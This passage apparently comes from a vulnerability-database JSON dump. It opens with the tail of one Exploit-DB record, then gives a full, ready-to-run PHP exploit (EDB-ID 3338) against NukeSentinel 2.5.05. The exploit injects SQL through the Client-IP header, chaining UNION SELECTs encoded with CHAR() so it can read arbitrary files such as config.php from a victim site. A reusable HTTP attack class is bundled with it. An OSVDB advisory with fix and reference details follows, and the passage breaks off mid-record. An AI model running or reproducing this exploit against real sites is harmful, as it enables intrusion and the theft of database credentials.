str_replace(chr(13),'',$codearr[2]);\r\n\t\t\t\tif(!eregi(\"://\",$location))\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get(\"http://\".$this->host.$this->path.$location);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get($location);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\treturn $code;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to reset some parameters:\r\n\t * \r\n\t * $this->reset(header); // headers cleaned\r\n\t * $this->reset(cookie); // cookies cleaned\r\n\t * $this->reset(); // clean 
all parameters\r\n\t *\r\n\t * @param string $func\r\n\t */\r\n\tpublic function reset($func='')\r\n\t{\r\n\t\tswitch($func)\r\n\t\t{\r\n\t\t\tcase \"header\":\r\n\t\t\t$this->header='';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tcase \"cookie\":\r\n\t\t\t$this->cookie='';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tdefault:\r\n\t\t $this->cookiejar='';\r\n\t\t $this->header='';\r\n\t\t $this->cookie='';\r\n\t\t $this->allowredirection=''; \r\n\t\t $this->agent='';\r\n\t\t break;\r\n\t\t}\r\n\t}\r\n}\r\n?>\r\n\r\n# milw0rm.com [2007-03-10]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3450/"}, {"lastseen": "2016-01-31T18:14:57", "description": "NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit. CVE-2007-1172,CVE-2007-1493. Webapps exploit for php platform", "published": "2007-02-20T00:00:00", "type": "exploitdb", "title": "NukeSentinel 2.5.05 - nukesentinel.php File Disclosure Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1493", "CVE-2007-1172"], "modified": "2007-02-20T00:00:00", "id": "EDB-ID:3338", "href": "https://www.exploit-db.com/exploits/3338/", "sourceData": "#!/usr/bin/php\n<?php\nerror_reporting(E_ALL ^ E_NOTICE);\n\n# Module's Description:\n# Advanced site security proudly produced by: NukeScripts Network, Raven PHPScripts, & NukeResources.\n# ... 
IS IT A JOKE ?!\n#\n# SQL Injection --> File Disclosure\n# Maybe work on other versions.\n# Interesting exploit =)\n#\nif($argc < 5) {\nprint(\"\n NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit\n------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated)\n Credits: DarkFig <gmdarkfig@gmail.com>\n URL: http://www.acid-root.new.fr/\n------------------------------------------------------------------\n Usage: $argv[0] -url <url> -file <file> [Options]\nExample: $argv[0] -url http://www.victim.com/ -file config.php\nOptions: -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd> \n------------------------------------------------------------------\n\"); exit(1);\n}\n\n$url = getparam('url',1); # http://localhost/php-nuke-7.9/html/\n$file = getparam('file',1); # config.php, admin/.htaccess\n$proxy = getparam('proxy');\n$authp = getparam('proxyauth');\n\n$xpl = new phpsploit();\n$xpl->agent(\"Mozilla Firefox\");\nif($proxy) $xpl->proxy($proxy);\nif($authp) $xpl->proxyauth($authp);\n\n\n# +nukesentinel.php\n#\n# 52. $nsnst_const['server_ip'] = get_server_ip();\n# 53. $nsnst_const['client_ip'] = get_client_ip();\n# 54. $nsnst_const['forward_ip'] = get_x_forwarded();\n# 55. $nsnst_const['remote_addr'] = get_remote_addr();\n# 56. $nsnst_const['remote_ip'] = get_ip(); // If $nsnst_const['client_ip'] return it, elseif $nsnst_const['forward_ip'] return it ... \n#\n#\n# $xpl->addheader(\"Client-IP\",\"<something>255.255.255.255<something>\");\n# |\n# 73. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['client_ip'])) {$nsnst_const['client_ip'] = \"none\"; }\n# 74. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['forward_ip'])) {$nsnst_const['forward_ip'] = \"none\"; }\n# 75. 
if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = \"none\"; }\n# 76. if(!ereg(\"([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['remote_addr'])) {$nsnst_const['remote_addr'] = \"none\"; }\n#\n#\n# 221. // Check if ip is blocked\n# 222. $blocked_row = abget_blocked($nsnst_const['remote_ip']);\n# 223. if($blocked_row) { blocked($blocked_row);}\n#\n#\n# $xpl->addheader(\"Client-IP\",\"' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.255\");\n# |\n# 723. function abget_blocked($remoteip) {\n# 724. global $prefix, $db;\n# 725. $ip = explode(\".\", $remoteip);\n# 726. $testip1 = \"$ip[0].*.*.*\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.*.*.*\n# 727. $testip2 = \"$ip[0].$ip[1].*.*\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.*.*\n# 728. $testip3 = \"$ip[0].$ip[1].$ip[2].*\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.*\n# 729. $testip4 = \"$ip[0].$ip[1].$ip[2].$ip[3]\"; // ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#255.255.255.255\n# 730. $blocked_result = $db->sql_query(\"SELECT * FROM `\".$prefix.\"_nsnst_blocked_ips` WHERE `ip_addr` = '$testip1' OR `ip_addr` = '$testip2' OR `ip_addr` = '$testip3' OR `ip_addr` = '$testip4'\");\n# 731. $blocked_row = $db->sql_fetchrow($blocked_result);\n# 732. return $blocked_row;\n# 733. }\n#\n#\n# 1044. function blocked($blocked_row=\"\", $blocker_row=\"\") {\n# 1050. if(empty($blocker_row)) { $blocker_row = abget_blockerrow($blocked_row['reason']); } // $blocked_row['reason'] ... 6,7,--->8<---,9\n#\n#\n# $xpl->addheader(\"Client-IP\",\"' UNION SELECT 1,2,3,4,5,6,7,\".mysqlchar(' UNION SELECT -666,2,3,4,5,6,7,'../config.php',9,10,11 ORDER BY blocker #).\",9,10,11,12,13,14,15,16,17,18#255.255.255.255\");\n# |\n# 750. function abget_blockerrow($reason){\n# 751. global $prefix, $db;\n# 752. 
$blockerresult = $db->sql_query(\"SELECT * FROM `\".$prefix.\"_nsnst_blockers` WHERE `blocker`='$reason'\"); // + ' UNION SELECT -666,2,3,4,5,6,7,'../config.php',9,10,11 ORDER BY blocker #\n# 753. $blocker_row = $db->sql_fetchrow($blockerresult);\n# 754. return $blocker_row;\n# 755. }\n#\n#\n# 1044. function blocked($blocked_row=\"\", $blocker_row=\"\") {\n# 1056. $display_page = abget_template($blocker_row['template']); // $blocker_row['template'] ... 6,7,--->'../config.php'<---,9\n#\n#\n# 1004. function abget_template($template=\"\") {\n# 1013. $filename = \"abuse/\".$template; // $template = ../config.php\n# 1014. if(!file_exists($filename)) { $filename = \"abuse/abuse_default.tpl\"; }\n# 1015. $handle = @fopen($filename, \"r\");\n# 1016. $display_page = fread($handle, filesize($filename));\n# 1017. @fclose($handle);\n# 1041. return $display_page;\n# 1042. }\n#\n# Interesting isn't it ? :]\n#\n$sql = \"' UNION SELECT 1,2,3,4,5,6,7,\"\n .mysqlchar(\"' UNION SELECT -666,2,3,4,5,6,7,'../$file',9,10,11 ORDER BY blocker #\")\n .\",9,10,11,12,13,14,15,16,17,18#255.255.255.255\";\n\n$xpl->addheader(\"Client-IP\",$sql);\n$xpl->get($url.'index.php');\nprint $xpl->getcontent();\n\nfunction mysqlchar($data)\n{\n\t$char='CHAR(';\n\tfor($i=0;$i<strlen($data);$i++)\n\t{\n\t\t$char .= ord($data[$i]);\n if($i != (strlen($data)-1)) $char .= ',';\n\t}\n\treturn $char.')';\n}\n\nfunction getparam($param,$opt='')\n{\n\tglobal $argv;\n\tforeach($argv as $value => $key)\n\t{\n\t\tif($key == '-'.$param) return $argv[$value+1];\n\t}\n\tif($opt) exit(\"\\n#3 -$param parameter required\");\n\telse return;\n}\n\n/*\n * \n * Copyright (C) darkfig\n * \n * This program is free software; you can redistribute it and/or \n * modify it under the terms of the GNU General Public License \n * as published by the Free Software Foundation; either version 2 \n * of the License, or (at your option) any later version. 
\n * \n * This program is distributed in the hope that it will be useful, \n * but WITHOUT ANY WARRANTY; without even the implied warranty of \n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n * GNU General Public License for more details. \n * \n * You should have received a copy of the GNU General Public License \n * along with this program; if not, write to the Free Software \n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * \n * TITLE: PhpSploit Class\n * REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)\n * VERSION: 1.2\n * LICENSE: GNU General Public License\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\n * FILENAME: phpsploitclass.php\n *\n * CONTACT: gmdarkfig@gmail.com (french / english)\n * GREETZ: Sparah, Ddx39\n *\n * DESCRIPTION:\n * The phpsploit is a class implementing a web user agent.\n * You can add cookies, headers, use a proxy server with (or without) a\n * basic authentification. It supports the GET and the POST method. It can\n * also be used like a browser with the cookiejar() function (which allow\n * a server to add several cookies for the next requests) and the\n * allowredirection() function (which allow the script to follow all\n * redirections sent by the server). It can return the content (or the\n * headers) of the request. 
Others useful functions can be used for debugging.\n * A manual is actually in development but to know how to use it, you can\n * read the comments.\n *\n * CHANGELOG:\n * [2007-01-24] (1.2)\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\n * * New: multipart/form-data enctype is now supported \n *\n * [2006-12-31] (1.1)\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\n * * New: You can now call the getheader() / getcontent() function without parameters\n *\n * [2006-12-30] (1.0)\n * * First version\n * \n */\n\nclass phpsploit {\n\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it, this is the main function.\n\t *\n\t * @return $server_response\n\t */\n\tprivate function sock()\n\t{\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\n\t\telse $socket = fsockopen($this->host,$this->port);\n\t\t\n\t\tif(!$socket) die(\"Error: The host doesn't exist\");\n\t\t\n\t\tif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";\n\t\telseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. 
\" HTTP/1.1\\r\\n\";\n\t\telse die(\"Error: Invalid method\");\n\t\t\n\t\tif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";\n\t\t$this->packet .= \"Host: \".$this->host.\"\\r\\n\";\n\t\t\n\t\tif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";\n\t\tif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";\n\t\t\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\n\t\tif($this->method===\"post\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\n\t\t}\n\t\telseif($this->method===\"formdata\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data;\n\t\t}\n\t\t$this->packet .= \"\\r\\n\";\n\t\t$this->recv = '';\n\t\t\n\t\tfputs($socket,$this->packet);\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\n\t\tfclose($socket);\n\t\t\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\n\t\telse return $this->recv;\n\t}\n\t\n\n\t/**\n\t * This function allows you to add several cookie in the\n\t * request. 
Several methods are supported:\n\t * \n\t * $this->addcookie(\"name\",\"value\");\n\t * or\n\t * $this->addcookie(\"name=newvalue\");\n\t * or\n\t * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");\n\t * \n\t * @param string $cookiename\n\t * @param string $cookievalue\n\t * \n\t */\n\tpublic function addcookie($cookn,$cookv='')\n\t{\n\t\t// $this->addcookie(\"name\",\"value\"); work avec replace\n\t\tif(!empty($cookv))\n\t\t{\n\t\t\tif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete\n\t\t\tif(!empty($this->cookie))\n\t\t\t{\n\t\t\t if(preg_match(\"/$cookn=/\",$this->cookie))\n\t\t\t {\n\t\t\t \t$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);\n\t\t\t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".\n\t\t\t }\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->cookie = $cookn.\"=\".$cookv.\";\";\n\t\t\t}\n\t\t}\n\t\t// $this->addcookie(\"name=value; othername=othervalue\");\n\t\telse\n\t\t{\n\t \t if(!empty($this->cookie))\n\t \t {\n\t \t \t$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);\n\t \t \t$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\n\t \t \t{\n\t \t \t\tpreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);\n\t \t \t\t$cookn = $matches[1];\n\t \t \t\t$cookv = $matches[2];\n\t \t \t\t$this->addcookie($cookn,$cookv);\n\t \t \t}\n\t \t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";\n\t\t\t \t$this->cookie = $cookn;\t\t\t\n\t\t\t }\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to add several headers in the\n\t * request. 
Several methods are supported:\n\t *\n\t * $this->addheader(\"headername\",\"headervalue\");\n\t * or\n\t * $this->addheader(\"headername: headervalue\");\n\t *\n\t * @param string $headername\n\t * @param string $headervalue\n\t */\n\tpublic function addheader($headern,$headervalue='')\n\t{\n\t\t// $this->addheader(\"name\",\"value\");\n\t\tif(!empty($headervalue))\n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\tif(preg_match(\"/$headern:/\",$this->header))\n\t\t\t\t{\n\t\t\t\t\t$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern.\": \".$headervalue;\n\t\t\t}\n\t\t}\n\t\t// $this->addheader(\"name: value\");\n\t\telse \n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\t$headarr = explode(\": \",$headern);\n\t\t\t\t$headern = $headarr[0];\n\t\t\t\t$headerv = $headarr[1];\n\t\t\t\t$this->addheader($headern,$headerv);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern;\n\t\t\t}\n\t\t}\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an http proxy server.\n\t * Several methods are supported:\n\t * \n\t * $this->proxy(\"proxyip\",\"8118\");\n\t * or\n\t * $this->proxy(\"proxyip:8118\")\n\t *\n\t * @param string $proxyhost\n\t * @param integer $proxyport\n\t */\n\tpublic function proxy($proxy,$proxyp='')\n\t{\n\t\t// $this->proxy(\"localhost:8118\");\n\t\tif(empty($proxyp))\n\t\t{\n\t\t\tpreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);\n\t\t\t$proxh = $proxarr[1];\n\t\t\t$proxp = $proxarr[2];\n\t\t\t$this->proxyhost=$proxh;\n\t\t\t$this->proxyport=$proxp;\n\t\t}\n\t\t// $this->proxy(\"localhost\",8118);\n\t\telse \n\t\t{\n\t\t\t$this->proxyhost=$proxy;\n\t\t\t$this->proxyport=intval($proxyp);\n\t\t}\n\t\tif($this->proxyport > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\n\t/**\n\t * This function allows you 
to use an http proxy server\n\t * which requires a basic authentification. Several\n\t * methods are supported:\n\t * \n\t * $this->proxyauth(\"darkfig\",\"dapasswd\");\n\t * or\n\t * $this->proxyauth(\"darkfig:dapasswd\");\n\t *\n\t * @param string $proxyuser\n\t * @param string $proxypass\n\t */\n\tpublic function proxyauth($proxyauth,$proxypasse='')\n\t{\n\t\t// $this->proxyauth(\"darkfig:password\");\n\t\tif(empty($proxypasse))\n\t\t{\n\t\t\tpreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);\n\t\t\t$proxu = $proxautharr[1];\n\t\t\t$proxp = $proxautharr[2];\n\t\t\t$this->proxyuser=$proxu;\n\t\t\t$this->proxypass=$proxp;\n\t\t}\n\t\t// $this->proxyauth(\"darkfig\",\"password\");\n\t\telse\n\t\t{\n\t\t\t$this->proxyuser=$proxyauth;\n\t\t\t$this->proxypass=$proxypasse;\n\t\t}\n\t}\n\n\t\n\t/**\n\t * This function allows you to set the \"User-Agent\" header.\n\t * Several methods are possible to do that:\n\t * \n\t * $this->agent(\"Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent: Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");\n\t * \n\t * @param string $useragent\n\t */\n\tpublic function agent($useragent)\n\t{\n\t\t$this->agent=$useragent;\n\t}\n\n\t\n\t/**\n\t * This function returns the header which will be\n\t * in the next request.\n\t * \n\t * $this->showheader();\n\t *\n\t * @return $header\n\t */\n\tpublic function showheader()\n\t{\n\t\treturn $this->header;\n\t}\n\n\t\n\t/**\n\t * This function returns the cookie which will be\n\t * in the next request.\n\t * \n\t * $this->showcookie();\n\t *\n\t * @return $storedcookies\n\t */\n\tpublic function showcookie()\n\t{\n\t\treturn $this->cookie;\n\t}\n\n\t\n\t/**\n\t * This function returns the last formed\n\t * http request (the http packet).\n\t * \n\t * $this->showlastrequest();\n\t * \n\t * @return $last_http_request\n\t */\n\tpublic function showlastrequest()\n\t{\n\t\treturn $this->packet;\n\t}\n\t\n\t\n\t/**\n\t * This function sends the 
formed http packet with the\n\t * GET method. You can precise the port of the host.\n\t * \n\t * $this->get(\"http://localhost\");\n\t * $this->get(\"http://localhost:888/xd/tst.php\");\n\t * \n\t * @param string $urlwithpath\n\t * @return $server_response\n\t */\n\tpublic function get($url)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"get\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method. You can precise the port of the host.\n\t * \n\t * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");\n\t *\n\t * @param string $urlwithpath\n\t * @param string $postdata\n\t * @return $server_response\n\t */\t\n\tpublic function post($url,$data)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"post\";\n\t\t$this->data=$data;\n\t\treturn $this->sock();\n\t}\n\t\n\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method using the multipart/form-data enctype. \n\t * \n\t * $array = array(\n\t * frmdt_url => \"http://localhost/upload.php\",\n\t * frmdt_boundary => \"123456\", # Optional\n\t * \"email\" => \"me@u.com\",\n\t * \"varname\" => array(\n\t * frmdt_type => \"image/gif\", # Optional\n\t * frmdt_transfert => \"binary\", # Optional\n\t * frmdt_filename => \"hello.php\",\n\t * frmdt_content => \"<?php echo ':)'; ?>\"));\n\t * $this->formdata($array);\n\t *\n\t * @param array $array\n\t * @return $server_response\n\t */\n\tpublic function formdata($array)\n\t{\n\t\t$this->target($array[frmdt_url]);\n\t\t$this->method=\"formdata\";\n\t\t$this->data='';\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";\n\t\telse $this->boundary=$array[frmdt_boundary];\n\t\tforeach($array as $key => $value)\n\t\t{\n\t\t\tif(!preg_match(\"#^frmdt_(boundary|url)#\",$key))\n\t\t\t{\n\t\t\t\t$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t\t$this->data .= \"Content-Disposition: form-data; 
name=\\\"\".$key.\"\\\";\";\n\t\t\t\tif(!is_array($value))\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function returns the content of the server response\n\t * without the headers.\n\t * \n\t * $this->getcontent($this->get(\"http://localhost/\"));\n\t * or\n\t * $this->getcontent();\n\t *\n\t * @param string $server_response\n\t * @return $onlythecontent\n\t */\n\tpublic function getcontent($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$content = explode(\"\\n\",$code);\n\t\t$onlycode = '';\n\t\tfor($i=1;$i<count($content);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;\n\t\t\tif($ok) $onlycode .= $content[$i].\"\\n\";\n\t\t}\n\t\treturn $onlycode;\n\t}\n\n\t\n\t/**\n\t * This function returns the headers of the server response\n\t * without the content.\n\t * \n\t * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));\n\t * or\n\t * $this->getheader();\n\t *\n\t * @param string $server_response\n\t * @return $onlytheheaders\n\t */\n\tpublic function getheader($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$header = explode(\"\\n\",$code);\n\t\t$onlyheader = $header[0].\"\\n\";\n\t\tfor($i=1;$i<count($header);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$header[$i])) break;\n\t\t\t$onlyheader .= $header[$i].\"\\n\";\n\t\t}\n\t\treturn 
$onlyheader;\n\t}\n\n\t\n\t/**\n\t * This function is called by the cookiejar() function.\n\t * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"\n\t * header for the next request. You don't have to call it.\n\t * \n\t * @param string $server_response\n\t */\n\tprivate function getcookie($code)\n\t{\n\t\t$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));\n\t\tfor($z=0;$z<count($carr);$z++)\n\t\t{\n\t\t\tif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))\n\t\t\t{\n\t\t\t\t$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));\n\t\t\t}\n\t\t}\n\n\t\tfor($i=0;$i<count($cookie);$i++)\n\t\t{\n\t\t\tpreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);\n\t \t $cookn = $matches[1];\n\t \t $cookv = $matches[2];\n\t \t $this->addcookie($cookn,$cookv);\n\t\t}\n }\n\n\t\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it.\n\t *\n\t * @param string $urltarg\n\t */\n\tprivate function target($urltarg)\n\t{\n\t\tif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";\n\t\t$this->url=$urltarg;\n\t\t\n\t\t$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));\n\t\t$this->host=$array[0];\n\n\t\tpreg_match(\"/:(\\d+)\\//\",$urltarg,$matches);\n\t\t$this->port=empty($matches[1]) ? 
80 : $matches[1];\n\t\t\n\t\t$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));\n\t\tpreg_match(\"/\\/(.*)\\//\",$temp,$matches);\n\t\t$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");\n\t\n\t\tif($this->port > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\t\n\t/**\n\t * If you call this function, the script will\n\t * extract all \"Set-Cookie\" headers values\n\t * and it will automatically add them into the \"Cookie\" header\n\t * for all next requests.\n\t *\n\t * $this->cookiejar(1); // enabled\n\t * $this->cookiejar(0); // disabled\n\t * \n\t */\n\tpublic function cookiejar($code)\n\t{\n\t\tif($code===0) $this->cookiejar='';\n\t\tif($code===1) $this->cookiejar=1;\n\t\telse\n\t\t{\n\t\t\t$this->getcookie($code);\n\t\t}\n\t}\n\n\n\t/**\n\t * If you call this function, the script will\n\t * follow all redirections sent by the server.\n\t * \n\t * $this->allowredirection(1); // enabled\n\t * $this->allowredirection(0); // disabled\n\t * \n\t * @return $this->get($locationresponse)\n\t */\n\tpublic function allowredirection($code)\n\t{\n\t\tif($code===0) $this->allowredirection='';\n\t\tif($code===1) $this->allowredirection=1;\n\t\telse\n\t\t{\n\t\t\tif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))\n\t\t\t{\n\t\t\t\t$location = str_replace(chr(13),'',$codearr[2]);\n\t\t\t\tif(!eregi(\"://\",$location))\n\t\t\t\t{\n\t\t\t\t\treturn $this->get(\"http://\".$this->host.$this->path.$location);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn $this->get($location);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\treturn $code;\n\t\t\t}\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to reset some parameters:\n\t * \n\t * $this->reset(header); // headers cleaned\n\t * $this->reset(cookie); // cookies cleaned\n\t * $this->reset(); // clean all parameters\n\t *\n\t * @param string $func\n\t */\n\tpublic function reset($func='')\n\t{\n\t\tswitch($func)\n\t\t{\n\t\t\tcase 
\"header\":\n\t\t\t$this->header='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tcase \"cookie\":\n\t\t\t$this->cookie='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tdefault:\n\t\t $this->cookiejar='';\n\t\t $this->header='';\n\t\t $this->cookie='';\n\t\t $this->allowredirection=''; \n\t\t $this->agent='';\n\t\t break;\n\t\t}\n\t}\n}\n?>\n\n# milw0rm.com [2007-02-20]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3338/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-1493", "CVE-2007-1172"], "description": "## Solution Description\nUpgrade to version 2.5.07 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n\nNote: This issue was thought to be fixed in 2.5.06, but the patch was incomplete: the regular expression used to validate the IP address was permissive (unanchored, so a header value containing a dotted quad anywhere in it passed the check), and SQL injection could still occur.\n## References:\n[Secunia Advisory ID:24221](https://secuniaresearch.flexerasoftware.com/advisories/24221/)\nOther Advisory URL: http://milw0rm.com/exploits/3338\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0348.html\nMail List Post: http://attrition.org/pipermail/vim/2007-March/001429.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0102.html\nKeyword: aka the \"File Disclosure Exploit.\" \n[CVE-2007-1493](https://vulners.com/cve/CVE-2007-1493)\n[CVE-2007-1172](https://vulners.com/cve/CVE-2007-1172)\n", "edition": 1, "modified": "2007-02-20T08:48:53", "published": "2007-02-20T08:48:53", "href": "https://vulners.com/osvdb/OSVDB:33765", "id": "OSVDB:33765", "title": "NukeSentinel nukesentinel.php Client-IP HTTP Header SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", 
